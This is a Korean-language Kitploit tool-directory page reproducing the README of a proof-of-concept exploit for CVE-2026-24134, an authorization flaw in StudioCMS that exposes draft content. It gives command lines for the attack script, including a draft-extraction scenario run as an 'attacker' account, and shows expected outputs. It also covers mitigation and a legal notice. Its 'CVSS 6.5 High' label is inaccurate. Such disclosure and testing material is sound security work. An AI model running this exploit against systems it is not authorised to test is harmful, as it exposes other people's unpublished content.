Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-24134-PoC — # CVE-2026-24134 개념 증명 익스플로잇 StudioCMS의 Broken Object Level Authorization 취약점으로, 초안 콘텐츠에 대한 무단 접근을 시연합니다. | Kitploit
도구/GitHubGitHub/filipegaudard/cve-2026-24134-poc
Vulnerability AnalysisExploitationWeb Application ExploitationAPI Security TestingPenetration TestingLearning & Education
GitHubfilipegaudard/cve-2026-24134-poc

CVE-2026-24134-PoC

# CVE-2026-24134 개념 증명 익스플로잇 StudioCMS의 Broken Object Level Authorization 취약점으로, 초안 콘텐츠에 대한 무단 접근을 시연합니다.

저장소 보기
6개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-24134-PoC

개요

이 저장소는 StudioCMS의 CVE-2026-24134, 즉 객체 수준 권한 부여(BOLA) 취약점에 대한 개념 증명(PoC)을 포함합니다.

내용

  • cve_2026_24134_poc.py - Python 공격 스크립트

사전 요구 사항

  • StudioCMS<=0.1.1
root@kitploit:~
pip install requests colorama

빠른 시작

수동 공격

root@kitploit:~
# 기본 사용법
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

# 출력을 파일로 저장
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
  --save

자동화 테스트

root@kitploit:~
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --editor-user editor01 \
  --editor-pass editorpass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

인자

필수

  • -u, --url - 대상 StudioCMS 기본 URL
  • --uuid - 대상 초안 콘텐츠 UUID

수동 모드

  • --username - 인증용 사용자 이름
  • --password - 인증용 비밀번호

자동화 테스트 모드

  • --auto-test - 자동화 테스트 활성화
  • --visitor-user - 방문자 계정 사용자 이름
  • --visitor-pass - 방문자 계정 비밀번호
  • --editor-user - 편집자 계정 사용자 이름
  • --editor-pass - 편집자 계정 비밀번호

선택 사항

  • --save - 응답 콘텐츠를 파일로 저장
  • --no-ssl-verify - SSL 인증서 검증 비활성화

예시 시나리오

시나리오 1: 시스템 취약 여부 테스트

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://target.com \
  --auto-test \
  --visitor-user test_visitor \
  --visitor-pass SecurePass123! \
  --editor-user test_editor \
  --editor-pass SecurePass456! \
  --uuid 12345678-1234-1234-1234-123456789abc

취약한 경우 예상 출력:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!

패치된 경우 예상 출력:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT

시나리오 2: 초안 콘텐츠 추출

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://localhost:4321 \
  --username attacker \
  --password pass123 \
  --uuid target-uuid-here \
  --save

이 명령은 전체 초안 콘텐츠를 draft_{uuid}.html 파일로 저장합니다.

출력 이해하기

성공 표시기

  • [+] - 성공적인 작업 (녹색)
  • [*] - 정보 메시지 (파란색)
  • [!] - 경고 (노란색)
  • [-] - 오류 (빨간색)

HTTP 상태 코드

  • 200 OK - 취약! 초안 콘텐츠에 접근됨
  • 403 Forbidden - 패치됨! 적절한 권한 부여가 적용됨
  • 404 Not Found - UUID가 유효하지 않거나 보안 구현이 적용됨 (존재 여부를 노출하는 대신 404 반환)
  • 401 Unauthorized - 인증 실패

완화 방법

취약한 버전의 StudioCMS를 실행 중이라면 즉시 패치된 버전으로 업데이트하세요.

개발자를 위한 안내

실제 문제: 권한 부여 검사가 서버 측이 아닌 클라이언트 측(JavaScript)에서 수행되었습니다.

개발팀에 따르면:

"현재 리다이렉트를 위한 등급 수준 검사가 클라이언트 JS에서 수행되고 있으며, 곧 교체될 예정이었습니다."

해결 방법: 권한 부여를 클라이언트에서 서버로 이동하세요.

핵심 원칙: 클라이언트를 절대 신뢰하지 마세요. 클라이언트 측 보안 = UX 향상. 서버 측 보안 = 실제 보호.

법적 고지

중요: 이 도구는 교육 및 공인된 보안 테스트 목적으로만 제공됩니다.

  • 소유한 시스템 또는 명시적 서면 허가를 받은 시스템에만 사용하세요
  • 무단 컴퓨터 시스템 접근은 대부분의 관할권에서 불법입니다
  • 저자는 이 도구의 오용에 대해 어떠한 책임도 지지 않습니다
  • 항상 책임 있는 공개 관행을 따르세요

참고 자료

  • CVE: CVE-2026-24134
  • CVSS: 6.5 High
  • CWE: CWE-639
  • OWASP: API1:2023 - Broken Object Level Authorization

연락처

이 PoC 또는 취약점에 대한 질문이 있으시면:

  • 저자: Filipe Gaudard

라이선스

이 PoC는 교육 목적으로 배포됩니다. 책임감 있고 윤리적으로 사용하세요.

도구 다운로드